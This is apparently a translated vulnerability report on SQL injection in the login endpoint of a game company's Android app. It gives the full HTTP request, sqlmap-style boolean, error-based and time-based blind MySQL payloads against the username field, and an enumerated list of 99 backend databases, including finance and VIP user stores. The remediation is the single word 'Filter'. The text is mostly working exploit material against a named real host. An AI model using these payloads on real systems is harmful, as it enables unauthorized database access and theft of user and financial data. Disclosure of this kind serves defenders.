An important APP in the giant's network has 99 databases for SQL injection.
Vulnerability app for Android:
http://mobile.ztgame.com/mobile/index.php
After the Android app is installed, SQL Injection exists at the login start.
POST /mobileapp/index.php HTTP/1.1Host: mobile.ztgame.comConnection: keep-aliveContent-Length: 52Accept: application/json, text/javascript, */*; q=0.01Origin: https://mobile.ztgame.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI NOTE LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Referer: https://mobile.ztgame.com/mobileapp/index.phpAccept-Encoding: gzip,deflateAccept-Language: zh-CN,en-US;q=0.8Cookie: PHPSESSID=9v4rnqlh8iej1gj6bi91sm5fr3act=setsubmit&username=admin&password=123456&openId=
Various injections:
---Parameter: username (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=setsubmit&username=admin' RLIKE (SELECT (CASE WHEN (1364=1364)THEN 0x61646d696e ELSE 0x28 END)) AND 'zBPi'='zBPi&password=123456&openId= Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: act=setsubmit&username=admin' AND (SELECT 3506 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(3506=3506,1))),0x717a787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CTYM'='CTYM&password=123456&openId= Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: act=setsubmit&username=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))umgI) AND 'IDKo'='IDKo&password=123456&openId=---[05:25:33] [INFO] the back-end DBMS is MySQLweb application technology: Apache 2.2.11, PHP 5.4.4back-end DBMS: MySQL 5.0
99 databases are involved, and data duplication is not important. You know better than me:
available databases [99]:[*] a_consume_day[*] a_ly360_consume_day[*] a_ptaidata_web[*] a_zoneinfo_hour[*] action_rpt_god[*] action_rpt_hs[*] action_rpt_pla[*] action_rpt_xxsj[*] action_rpt_ztgame[*] action_rpt_ztnew[*] all_zoneInfo[*] all_zoneInfo_hour[*] anti_fraud_cheat_account[*] anti_fraud_stat[*] area_stat_rpt[*] buy_silver[*] caiwu_check[*] caiwu_data_report[*] cb_rpt[*] check_ordervsobj[*] check_up[*] classify_user_rpt[*] consume_vip[*] cs_order[*] csjz_cb_tmp[*] csjz_hour_stat[*] data_node_course_detail[*] data_node_name_day[*] db_union_sortlist[*] dim_tpart_config[*] dim_zoneinfo_for_xinjian[*] easy_consume_rpt[*] finance_dw[*] finance_lost_reg[*] GAQ[*] GAQ1_download[*] GAQ4_download[*] GAQ5_download[*] GAQ6_download[*] GAQ8_download[*] GAQ9_download[*] hbs[*] hour_computer[*] hour_computer_back[*] hour_computer_bak11111[*] information_schema[*] jh_sortlist[*] loading_lost[*] mail_quick[*] media_stat[*] money_monitor[*] mysql[*] new_user_rpt[*] newzone_15index[*] objkeywords_stat[*] peng[*] ptai_stat_219[*] ptai_stat_report[*] ptai_stat_report_del[*] ptai_stat_rpt[*] realtime_rpt[*] realtime_rpt_test[*] realtime_rpt_tmp[*] remain_rpt[*] report[*] resource_manage_system[*] rpt_client_adcost[*] rpt_client_ptai_stat[*] rpt_mobile_conf[*] rpt_mobile_consume_stat[*] rpt_mobile_ptai_stat[*] rpt_mobile_realtime_stat[*] rpt_mobile_realtime_stat_test[*] rpt_mobile_user_trace[*] rpt_mobile_user_trace_test[*] rpt_must_ptai_stat[*] rpt_must_user_trace[*] scb_ws[*] scb_xxsj[*] select_db_detail[*] sobj_stat[*] sortlist_collect_rpt[*] stat[*] stat_analyze[*] stat_consume[*] test[*] transform_rpt[*] user_analyze[*] user_analyze_xt[*] user_analyze_zt2[*] user_analyze_ztgame[*] user_center_rpt[*] user_segmentation_report[*] vip[*] vip_xt_obj[*] vip_zt2_obj[*] vip_ztgame_obj[*] xxxx[*] zoneinfo
Intuition tells me that the amount of data information is very important. As a white hat with cool operations, I can check the logs before I exit the database.
Solution:
Filter